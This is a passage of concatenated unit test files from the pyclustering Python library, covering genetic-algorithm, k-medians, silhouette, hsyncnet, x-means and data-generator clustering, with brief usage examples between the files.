def test_incorrect_amount_clusters(self):
self.assertRaises(ValueError, genetic_algorithm, [[0], [1], [2]], 0, 2, 2)
```
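Pulling the pieces of the templates together, a minimal end-to-end run of the genetic algorithm with an observer attached (the keyword names are the ones used in the tests above; data and parameter values are illustrative):
```python
from pyclustering.cluster.ga import genetic_algorithm, ga_observer

data = [[0, 0], [0, 2], [6, 0], [6, 2]]
observer = ga_observer(True, True, True)  # collect global best, population best, mean

ga_instance = genetic_algorithm(data, 2, 20, 20, count_mutation_gens=1,
                                observer=observer, random_state=1000)
ga_instance.process()
print(ga_instance.get_clusters())
print(len(observer))  # iterations + 1 snapshots when collecting is enabled
```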
#### File: tests/unit/ut_generator.py
```python
import unittest
# Generate images without having a window appear.
import matplotlib
matplotlib.use('Agg')
from pyclustering.cluster.generator import data_generator
from pyclustering.tests.assertion import assertion
class generator_unit_tests(unittest.TestCase):
def assert_dimension(self, data, expected_dimension):
for point in data:
assertion.eq(expected_dimension, len(point))
def assert_distribution(self, data, sizes, centers, widths):
index_cluster = 0
index_cluster_point = 0
actual_means = [[0.0 for _ in range(len(data[0])) ] for _ in range(len(sizes))]
for index_point in range(len(data)):
for index_dimension in range(len(data[0])):
actual_means[index_cluster][index_dimension] += data[index_point][index_dimension]
index_cluster_point += 1
if index_cluster_point == sizes[index_cluster]:
index_cluster_point = 0
index_cluster += 1
for index_cluster in range(len(actual_means)):
for index_dimension in range(len(data[0])):
actual_means[index_cluster][index_dimension] /= sizes[index_cluster]
assertion.ge(centers[index_cluster][index_dimension], actual_means[index_cluster][index_dimension] - widths[index_cluster])
assertion.le(centers[index_cluster][index_dimension], actual_means[index_cluster][index_dimension] + widths[index_cluster])
def test_generate_one_dimension(self):
data = data_generator(2, 1, [10, 10]).generate()
assertion.eq(20, len(data))
self.assert_dimension(data, 1)
def test_generate_two_dimension(self):
data = data_generator(2, 2, [10, 15]).generate()
assertion.eq(25, len(data))
self.assert_dimension(data, 2)
def test_generate_one_cluster(self):
data = data_generator(1, 10, 20).generate()
assertion.eq(20, len(data))
self.assert_dimension(data, 10)
def test_generate_similar_clusters(self):
data = data_generator(10, 2, 10).generate()
assertion.eq(100, len(data))
self.assert_dimension(data, 2)
def test_generate_with_centers(self):
data = data_generator(3, 1, [5, 10, 15], [[0.0], [-5.0], [5.0]]).generate()
assertion.eq(30, len(data))
self.assert_distribution(data, [5, 10, 15], [[0.0], [-5.0], [5.0]], [1.0, 1.0, 1.0])
```
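The generator's signature, as exercised above, is (cluster count, dimension, per-cluster sizes, optional centers); for example:
```python
from pyclustering.cluster.generator import data_generator

# Three 1-D clusters of 5, 10 and 15 points around the given centers.
data = data_generator(3, 1, [5, 10, 15], [[0.0], [-5.0], [5.0]]).generate()
print(len(data))  # 30 points in total
print(data[:3])   # points drawn near the first center
```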
#### File: tests/unit/ut_hsyncnet.py
```python
import unittest
# Generate images without having a window appear.
import matplotlib
matplotlib.use('Agg')
from pyclustering.cluster.tests.hsyncnet_templates import HsyncnetTestTemplates
from pyclustering.nnet import solve_type
from pyclustering.samples.definitions import SIMPLE_SAMPLES
class HsyncnetUnitTest(unittest.TestCase):
    def testClusteringSampleSimple1(self):
        HsyncnetTestTemplates.templateClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, [5, 5], solve_type.FAST, 5, 0.3, True, False)
    def testClusteringOneAllocationSampleSimple1(self):
        HsyncnetTestTemplates.templateClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 1, [10], solve_type.FAST, 5, 0.3, True, False)
    def testClusteringSampleSimple1WithoutCollecting(self):
        HsyncnetTestTemplates.templateClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, [5, 5], solve_type.FAST, 5, 0.3, False, False)
    def testClusteringSampleSimple2(self):
        HsyncnetTestTemplates.templateClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 3, [10, 5, 8], solve_type.FAST, 5, 0.2, True, False)
    def testClusteringOneAllocationSampleSimple2(self):
        HsyncnetTestTemplates.templateClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 1, [23], solve_type.FAST, 5, 0.2, True, False)
    def testClusteringOneDimensionDataSampleSimple7(self):
        HsyncnetTestTemplates.templateClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, 2, [10, 10], solve_type.FAST, 5, 0.3, True, False)
    def testClusteringTheSameData1(self):
        HsyncnetTestTemplates.templateClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, 3, [5, 5, 5], solve_type.FAST, 5, 0.3, True, False)
    def testDynamicLengthCollecting(self):
        HsyncnetTestTemplates.templateDynamicLength(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, None, 5, 0.3, True, False)
    def testDynamicLengthWithoutCollecting(self):
        HsyncnetTestTemplates.templateDynamicLength(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, None, 5, 0.3, False, False)
```
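For a single template invocation outside the test runner, the parameter roles (inferred from how the values vary across the tests) are: sample, expected cluster count, expected cluster sizes, solver, initial neighbors, increase percent, collect-dynamic flag, ccore flag:
```python
from pyclustering.cluster.tests.hsyncnet_templates import HsyncnetTestTemplates
from pyclustering.nnet import solve_type
from pyclustering.samples.definitions import SIMPLE_SAMPLES

HsyncnetTestTemplates.templateClustering(
    SIMPLE_SAMPLES.SAMPLE_SIMPLE1,  # sample to cluster
    2, [5, 5],                      # expected cluster count and sizes
    solve_type.FAST,                # ODE solver for the oscillatory network
    5, 0.3,                         # initial neighbors, increase percent
    True, False)                    # collect dynamic, use C++ core
```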
#### File: tests/unit/ut_kmedians.py
```python
import unittest
import numpy
# Generate images without having a window appear.
import matplotlib
matplotlib.use('Agg')
from pyclustering.cluster.tests.kmedians_templates import KmediansTestTemplates
from pyclustering.cluster.kmedians import kmedians
from pyclustering.samples.definitions import SIMPLE_SAMPLES
from pyclustering.utils import read_sample
from pyclustering.utils.metric import type_metric, distance_metric
class KmediansUnitTest(unittest.TestCase):
def testClusterAllocationSampleSimple1(self):
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], False)
def testClusterAllocationSampleSimple1Euclidean(self):
metric = distance_metric(type_metric.EUCLIDEAN)
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], False, metric=metric)
def testClusterAllocationSampleSimple1EuclideanSquare(self):
metric = distance_metric(type_metric.EUCLIDEAN_SQUARE)
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], False, metric=metric)
def testClusterAllocationSampleSimple1Manhattan(self):
metric = distance_metric(type_metric.MANHATTAN)
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], False, metric=metric)
def testClusterAllocationSampleSimple1Chebyshev(self):
metric = distance_metric(type_metric.CHEBYSHEV)
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], False, metric=metric)
def testClusterAllocationSampleSimple1Minkowski(self):
metric = distance_metric(type_metric.MINKOWSKI, degree=2.0)
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], False, metric=metric)
def testClusterAllocationSampleSimple1UserDefined(self):
metric = distance_metric(type_metric.USER_DEFINED, func=distance_metric(type_metric.EUCLIDEAN))
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], False, metric=metric)
def testClusterAllocationSample1NumpyArrayUserDefined(self):
metric = distance_metric(type_metric.USER_DEFINED, func=distance_metric(type_metric.EUCLIDEAN))
input_data = numpy.array(read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE1))
initial_centers = numpy.array([[3.7, 5.5], [6.7, 7.5]])
KmediansTestTemplates.templateLengthProcessData(input_data, initial_centers, [5, 5], False, metric=metric)
def testClusterAllocationSample2NumpyArrayUserDefined(self):
metric = distance_metric(type_metric.USER_DEFINED, func=distance_metric(type_metric.EUCLIDEAN_SQUARE))
input_data = numpy.array(read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE2))
initial_centers = numpy.array([[3.5, 4.8], [6.9, 7], [7.5, 0.5]])
KmediansTestTemplates.templateLengthProcessData(input_data, initial_centers, [10, 5, 8], False, metric=metric)
def testClusterOneAllocationSampleSimple1(self):
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[1.0, 2.5]], [10], False)
def testClusterAllocationSampleSimple2(self):
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, [[3.5, 4.8], [6.9, 7], [7.5, 0.5]], [10, 5, 8], False)
def testClusterOneAllocationSampleSimple2(self):
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, [[0.5, 0.2]], [23], False)
def testClusterAllocationSampleSimple3(self):
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, [[0.2, 0.1], [4.0, 1.0], [2.0, 2.0], [2.3, 3.9]], [10, 10, 10, 30], False)
def testClusterOneAllocationSampleSimple3(self):
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, [[0.2, 0.1]], [60], False)
def testClusterAllocationSampleSimple5(self):
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, [[0.0, 1.0], [0.0, 0.0], [1.0, 1.0], [1.0, 0.0]], [15, 15, 15, 15], False)
def testClusterOneAllocationSampleSimple5(self):
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, [[0.0, 0.0]], [60], False)
def testClusterAllocationSample1WrongInitialNumberCenters1(self):
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[2.8, 9.5], [3.5, 6.6], [1.3, 4.0]], None, False)
def testClusterAllocationSample1WrongInitialNumberCenters2(self):
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[2.8, 9.5], [3.5, 6.6], [1.3, 4.0], [1.2, 4.5]], None, False)
def testClusterAllocationSample2WrongInitialNumberCenters(self):
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, [[3.5, 4.8], [6.9, 7], [7.5, 0.5], [7.3, 4.5], [3.1, 5.4]], None, False)
def testClusterTheSameData1(self):
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, [ [4.1], [7.3] ], [10, 20], False)
def testClusterTheSameData2(self):
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, [ [1.1, 1.0], [3.0, 3.1], [5.0, 4.9] ], [5, 5, 5], False)
def testOddSize(self):
# Bug issue #428 (https://github.com/annoviko/pyclustering/issues/428)
data = [[59.00732, 9.748167], [59.00608, 9.749117], [59.0047, 9.749933]]
KmediansTestTemplates.templateLengthProcessData(data, [[59.00732, 9.748167], [59.00608, 9.749117]], None, False, tolerance=10)
def testDifferentDimensions(self):
kmedians_instance = kmedians([ [0, 1, 5], [0, 2, 3] ], [ [0, 3] ], ccore=False)
self.assertRaises(NameError, kmedians_instance.process)
def testClusterAllocationOneDimensionData(self):
KmediansTestTemplates.templateClusterAllocationOneDimensionData(False)
def testClusterAllocationTheSameObjectsOneInitialCenter(self):
KmediansTestTemplates.templateClusterAllocationTheSameObjects(20, 1, False)
def testClusterAllocationTheSameObjectsTwoInitialCenters(self):
KmediansTestTemplates.templateClusterAllocationTheSameObjects(15, 2, False)
def testClusterAllocationTheSameObjectsThreeInitialCenters(self):
KmediansTestTemplates.templateClusterAllocationTheSameObjects(25, 3, False)
def testClusterAllocationSampleRoughMediansSimple10(self):
initial_medians = [[0.0772944481804071, 0.05224990900863469], [1.6021689021213712, 1.0347579135245601], [2.3341008076636096, 1.280022869739064]]
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE10, initial_medians, None, False)
def testTotalWCESimple4(self):
sample = [[0, 1, 5], [7, 8, 9], [0, 2, 3], [4, 5, 6]]
initial_medians = [[0, 3, 2], [4, 6, 5]]
kmedians_instance = kmedians(sample, initial_medians, ccore=False)
        self.assertNotEqual(kmedians_instance.get_total_wce(), 16.0)
def testPredictOnePoint(self):
centers = [[0.2, 0.1], [4.0, 1.0], [2.0, 2.0], [2.3, 3.9]]
KmediansTestTemplates.templatePredict(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, centers, [[0.3, 0.2]], [0], False)
KmediansTestTemplates.templatePredict(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, centers, [[4.1, 1.1]], [1], False)
KmediansTestTemplates.templatePredict(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, centers, [[2.1, 1.9]], [2], False)
KmediansTestTemplates.templatePredict(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, centers, [[2.1, 4.1]], [3], False)
def testPredictOnePointUserMetric(self):
centers = [[0.2, 0.1], [4.0, 1.0], [2.0, 2.0], [2.3, 3.9]]
metric = distance_metric(type_metric.USER_DEFINED, func=distance_metric(type_metric.EUCLIDEAN))
KmediansTestTemplates.templatePredict(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, centers, [[0.3, 0.2]], [0], False, metric=metric)
def testPredictTwoPoints(self):
centers = [[0.2, 0.1], [4.0, 1.0], [2.0, 2.0], [2.3, 3.9]]
KmediansTestTemplates.templatePredict(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, centers, [[0.3, 0.2], [2.1, 1.9]], [0, 2], False)
KmediansTestTemplates.templatePredict(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, centers, [[2.1, 4.1], [2.1, 1.9]], [3, 2], False)
def testPredictTwoPointsUserMetric(self):
centers = [[0.2, 0.1], [4.0, 1.0], [2.0, 2.0], [2.3, 3.9]]
metric = distance_metric(type_metric.USER_DEFINED, func=distance_metric(type_metric.EUCLIDEAN))
KmediansTestTemplates.templatePredict(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, centers, [[0.3, 0.2], [2.1, 1.9]], [0, 2], False, metric=metric)
def testPredictFourPoints(self):
centers = [[0.2, 0.1], [4.0, 1.0], [2.0, 2.0], [2.3, 3.9]]
to_predict = [[0.3, 0.2], [4.1, 1.1], [2.1, 1.9], [2.1, 4.1]]
KmediansTestTemplates.templatePredict(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, centers, to_predict, [0, 1, 2, 3], False)
def testPredictFivePoints(self):
centers = [[0.2, 0.1], [4.0, 1.0], [2.0, 2.0], [2.3, 3.9]]
to_predict = [[0.3, 0.2], [4.1, 1.1], [3.9, 1.1], [2.1, 1.9], [2.1, 4.1]]
KmediansTestTemplates.templatePredict(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, centers, to_predict, [0, 1, 1, 2, 3], False)
def testPredictFivePointsUserMetric(self):
centers = [[0.2, 0.1], [4.0, 1.0], [2.0, 2.0], [2.3, 3.9]]
to_predict = [[0.3, 0.2], [4.1, 1.1], [3.9, 1.1], [2.1, 1.9], [2.1, 4.1]]
metric = distance_metric(type_metric.USER_DEFINED, func=distance_metric(type_metric.EUCLIDEAN))
KmediansTestTemplates.templatePredict(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, centers, to_predict, [0, 1, 1, 2, 3], False, metric=metric)
def testItermax0(self):
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [], False, itermax=0)
def testItermax1(self):
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], False, itermax=1)
def testItermax10Simple01(self):
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], False, itermax=10)
def testItermax10Simple02(self):
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, [[3.5, 4.8], [6.9, 7], [7.5, 0.5]], [10, 5, 8], False, itermax=10)
def test_incorrect_data(self):
self.assertRaises(ValueError, kmedians, [], [[1]])
def test_incorrect_centers(self):
self.assertRaises(ValueError, kmedians, [[0], [1], [2]], [])
def test_incorrect_tolerance(self):
self.assertRaises(ValueError, kmedians, [[0], [1], [2]], [[1]], -1.0)
def test_incorrect_itermax(self):
self.assertRaises(ValueError, kmedians, [[0], [1], [2]], [[1]], itermax=-5)
```
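A compact standalone run of K-Medians, mirroring the constructor and accessors used in the tests (`get_medians` is assumed to follow the library's usual accessor pattern; data is illustrative):
```python
from pyclustering.cluster.kmedians import kmedians

data = [[0.0, 0.0], [0.2, 0.1], [0.1, 0.3],
        [4.0, 4.0], [4.2, 4.1], [4.1, 4.3]]
initial_medians = [[0.1, 0.1], [4.1, 4.1]]

kmedians_instance = kmedians(data, initial_medians, ccore=False)
kmedians_instance.process()
print(kmedians_instance.get_clusters())  # expected: [[0, 1, 2], [3, 4, 5]]
print(kmedians_instance.get_medians())   # refined medians after convergence
print(kmedians_instance.predict([[0.0, 0.1], [4.0, 4.2]]))  # expected: [0, 1]
```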
#### File: tests/unit/ut_silhouette.py
```python
import unittest
# Generate images without having a window appear.
import matplotlib
matplotlib.use('Agg')
from pyclustering.cluster.silhouette import silhouette, silhouette_ksearch_type
from pyclustering.cluster.tests.silhouette_templates import silhouette_test_template
from pyclustering.samples.definitions import SIMPLE_SAMPLES, SIMPLE_ANSWERS
class silhouette_unit_tests(unittest.TestCase):
def test_correct_score_simple01(self):
silhouette_test_template.correct_scores(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, SIMPLE_ANSWERS.ANSWER_SIMPLE1, False)
def test_correct_score_simple02(self):
silhouette_test_template.correct_scores(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, SIMPLE_ANSWERS.ANSWER_SIMPLE2, False)
def test_correct_score_simple03(self):
silhouette_test_template.correct_scores(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, SIMPLE_ANSWERS.ANSWER_SIMPLE3, False)
def test_correct_score_simple04(self):
silhouette_test_template.correct_scores(SIMPLE_SAMPLES.SAMPLE_SIMPLE4, SIMPLE_ANSWERS.ANSWER_SIMPLE4, False)
def test_correct_score_simple05(self):
silhouette_test_template.correct_scores(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, SIMPLE_ANSWERS.ANSWER_SIMPLE5, False)
def test_correct_score_simple06(self):
silhouette_test_template.correct_scores(SIMPLE_SAMPLES.SAMPLE_SIMPLE6, SIMPLE_ANSWERS.ANSWER_SIMPLE6, False)
def test_correct_score_simple07(self):
silhouette_test_template.correct_scores(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, SIMPLE_ANSWERS.ANSWER_SIMPLE7, False)
def test_correct_score_simple08(self):
silhouette_test_template.correct_scores(SIMPLE_SAMPLES.SAMPLE_SIMPLE8, SIMPLE_ANSWERS.ANSWER_SIMPLE8, False)
def test_correct_ksearch_simple01(self):
silhouette_test_template.correct_ksearch(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, SIMPLE_ANSWERS.ANSWER_SIMPLE1, 2, 10,
silhouette_ksearch_type.KMEANS, False)
def test_correct_ksearch_simple01_kmedoids(self):
silhouette_test_template.correct_ksearch(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, SIMPLE_ANSWERS.ANSWER_SIMPLE1, 2, 10,
silhouette_ksearch_type.KMEDOIDS, False)
def test_correct_ksearch_simple01_kmedians(self):
silhouette_test_template.correct_ksearch(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, SIMPLE_ANSWERS.ANSWER_SIMPLE1, 2, 10,
silhouette_ksearch_type.KMEDIANS, False)
def test_correct_ksearch_simple02(self):
silhouette_test_template.correct_ksearch(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, SIMPLE_ANSWERS.ANSWER_SIMPLE2, 2, 10,
silhouette_ksearch_type.KMEANS, False)
def test_correct_ksearch_simple02_kmedoids(self):
silhouette_test_template.correct_ksearch(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, SIMPLE_ANSWERS.ANSWER_SIMPLE2, 2, 10,
silhouette_ksearch_type.KMEDOIDS, False)
def test_correct_ksearch_simple02_kmedians(self):
silhouette_test_template.correct_ksearch(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, SIMPLE_ANSWERS.ANSWER_SIMPLE2, 2, 10,
silhouette_ksearch_type.KMEDIANS, False)
def test_correct_ksearch_simple03(self):
silhouette_test_template.correct_ksearch(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, SIMPLE_ANSWERS.ANSWER_SIMPLE3, 2, 10,
silhouette_ksearch_type.KMEANS, False)
def test_correct_ksearch_simple03_kmedoids(self):
silhouette_test_template.correct_ksearch(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, SIMPLE_ANSWERS.ANSWER_SIMPLE3, 2, 10,
silhouette_ksearch_type.KMEDOIDS, False)
def test_correct_ksearch_simple03_kmedians(self):
silhouette_test_template.correct_ksearch(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, SIMPLE_ANSWERS.ANSWER_SIMPLE3, 2, 10,
silhouette_ksearch_type.KMEDIANS, False)
def test_correct_ksearch_simple05(self):
silhouette_test_template.correct_ksearch(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, SIMPLE_ANSWERS.ANSWER_SIMPLE5, 2, 10,
silhouette_ksearch_type.KMEANS, False)
def test_correct_ksearch_simple06(self):
silhouette_test_template.correct_ksearch(SIMPLE_SAMPLES.SAMPLE_SIMPLE6, SIMPLE_ANSWERS.ANSWER_SIMPLE6, 2, 10,
silhouette_ksearch_type.KMEANS, False)
def test_correct_ksearch_simple07(self):
silhouette_test_template.correct_ksearch(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, SIMPLE_ANSWERS.ANSWER_SIMPLE7, 2, 10,
silhouette_ksearch_type.KMEANS, False)
def test_correct_ksearch_simple08(self):
silhouette_test_template.correct_ksearch(SIMPLE_SAMPLES.SAMPLE_SIMPLE8, SIMPLE_ANSWERS.ANSWER_SIMPLE8, 2, 10,
silhouette_ksearch_type.KMEANS, False)
def test_correct_ksearch_simple09(self):
silhouette_test_template.correct_ksearch(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, SIMPLE_ANSWERS.ANSWER_SIMPLE9, 2, 10,
silhouette_ksearch_type.KMEANS, False)
def test_correct_ksearch_simple10(self):
silhouette_test_template.correct_ksearch(SIMPLE_SAMPLES.SAMPLE_SIMPLE10, SIMPLE_ANSWERS.ANSWER_SIMPLE10, 2, 10,
silhouette_ksearch_type.KMEANS, False)
def test_correct_ksearch_simple11(self):
silhouette_test_template.correct_ksearch(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, SIMPLE_ANSWERS.ANSWER_SIMPLE11, 2, 10,
silhouette_ksearch_type.KMEANS, False)
def test_correct_ksearch_simple12(self):
silhouette_test_template.correct_ksearch(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, SIMPLE_ANSWERS.ANSWER_SIMPLE12, 2, 10,
silhouette_ksearch_type.KMEANS, False)
def test_correct_ksearch_simple13(self):
silhouette_test_template.correct_ksearch(SIMPLE_SAMPLES.SAMPLE_SIMPLE13, SIMPLE_ANSWERS.ANSWER_SIMPLE13, 2, 10,
silhouette_ksearch_type.KMEANS, False)
def test_distance_matrix_sample01(self):
silhouette_test_template.correct_processing_data_types(SIMPLE_SAMPLES.SAMPLE_SIMPLE1,
SIMPLE_ANSWERS.ANSWER_SIMPLE1, False)
def test_distance_matrix_sample02(self):
silhouette_test_template.correct_processing_data_types(SIMPLE_SAMPLES.SAMPLE_SIMPLE2,
SIMPLE_ANSWERS.ANSWER_SIMPLE2, False)
def test_distance_matrix_sample03(self):
silhouette_test_template.correct_processing_data_types(SIMPLE_SAMPLES.SAMPLE_SIMPLE3,
SIMPLE_ANSWERS.ANSWER_SIMPLE3, False)
def test_distance_matrix_sample04(self):
silhouette_test_template.correct_processing_data_types(SIMPLE_SAMPLES.SAMPLE_SIMPLE4,
SIMPLE_ANSWERS.ANSWER_SIMPLE4, False)
def test_distance_matrix_sample05(self):
silhouette_test_template.correct_processing_data_types(SIMPLE_SAMPLES.SAMPLE_SIMPLE5,
SIMPLE_ANSWERS.ANSWER_SIMPLE5, False)
def test_distance_matrix_sample06(self):
silhouette_test_template.correct_processing_data_types(SIMPLE_SAMPLES.SAMPLE_SIMPLE6,
SIMPLE_ANSWERS.ANSWER_SIMPLE6, False)
def test_distance_matrix_sample07(self):
silhouette_test_template.correct_processing_data_types(SIMPLE_SAMPLES.SAMPLE_SIMPLE7,
SIMPLE_ANSWERS.ANSWER_SIMPLE7, False)
def test_random_state_1_kmeans(self):
silhouette_test_template.random_state(2, 10, silhouette_ksearch_type.KMEANS, 1, False)
def test_random_state_2_kmeans(self):
silhouette_test_template.random_state(2, 10, silhouette_ksearch_type.KMEANS, 2, False)
def test_random_state_4_kmeans(self):
silhouette_test_template.random_state(2, 10, silhouette_ksearch_type.KMEANS, 4, False)
def test_random_state_8_kmeans(self):
silhouette_test_template.random_state(2, 10, silhouette_ksearch_type.KMEANS, 8, False)
def test_random_state_16_kmeans(self):
silhouette_test_template.random_state(2, 10, silhouette_ksearch_type.KMEANS, 16, False)
def test_random_state_128_kmeans(self):
silhouette_test_template.random_state(2, 10, silhouette_ksearch_type.KMEANS, 128, False)
def test_random_state_1024_kmeans(self):
silhouette_test_template.random_state(2, 10, silhouette_ksearch_type.KMEANS, 1024, False)
def test_random_state_1_kmedians(self):
silhouette_test_template.random_state(2, 10, silhouette_ksearch_type.KMEDIANS, 1, False)
def test_random_state_2_kmedians(self):
silhouette_test_template.random_state(2, 10, silhouette_ksearch_type.KMEDIANS, 2, False)
def test_random_state_4_kmedians(self):
silhouette_test_template.random_state(2, 10, silhouette_ksearch_type.KMEDIANS, 4, False)
def test_random_state_128_kmedians(self):
silhouette_test_template.random_state(2, 10, silhouette_ksearch_type.KMEDIANS, 128, False)
def test_random_state_1024_kmedians(self):
silhouette_test_template.random_state(2, 10, silhouette_ksearch_type.KMEDIANS, 1024, False)
def test_random_state_1_kmedoids(self):
silhouette_test_template.random_state(2, 10, silhouette_ksearch_type.KMEDOIDS, 1, False)
def test_random_state_2_kmedoids(self):
silhouette_test_template.random_state(2, 10, silhouette_ksearch_type.KMEDOIDS, 2, False)
def test_random_state_4_kmedoids(self):
silhouette_test_template.random_state(2, 10, silhouette_ksearch_type.KMEDOIDS, 4, False)
def test_random_state_128_kmedoids(self):
silhouette_test_template.random_state(2, 10, silhouette_ksearch_type.KMEDOIDS, 128, False)
def test_random_state_1024_kmedoids(self):
silhouette_test_template.random_state(2, 10, silhouette_ksearch_type.KMEDOIDS, 1024, False)
def test_incorrect_data(self):
self.assertRaises(ValueError, silhouette, [], [[1, 2], [3, 4]])
def test_incorrect_clusters(self):
self.assertRaises(ValueError, silhouette, [[1], [2], [3], [4]], [])
```
#### File: tests/unit/ut_xmeans.py
```python
import unittest
# Generate images without having a window appear.
import matplotlib
matplotlib.use('Agg')
from pyclustering.cluster.tests.xmeans_templates import XmeansTestTemplates
from pyclustering.cluster.xmeans import xmeans, splitting_type
from pyclustering.samples.definitions import SIMPLE_SAMPLES, FCPS_SAMPLES
from pyclustering.utils import read_sample
from pyclustering.utils.metric import distance_metric, type_metric
class XmeansUnitTest(unittest.TestCase):
def testBicClusterAllocationSampleSimple1(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testBicClusterAllocationSampleSimple1Repeat(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False, repeat=5)
def testBicSampleSimple1WithoutInitialCenters(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, None, [5, 5], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testBicSampleSimple1WithoutInitialCentersRepeat(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, None, [5, 5], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False, repeat=3)
def testBicSampleSimple1MaxLessReal(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5]], None, splitting_type.BAYESIAN_INFORMATION_CRITERION, 1, False)
def testBicSampleSimple1MaxLessRealRepeat(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5]], None, splitting_type.BAYESIAN_INFORMATION_CRITERION, 1, False, repeat=5)
def testBicClusterAllocationSampleSimple1MetricEuclidean(self):
metric = distance_metric(type_metric.EUCLIDEAN)
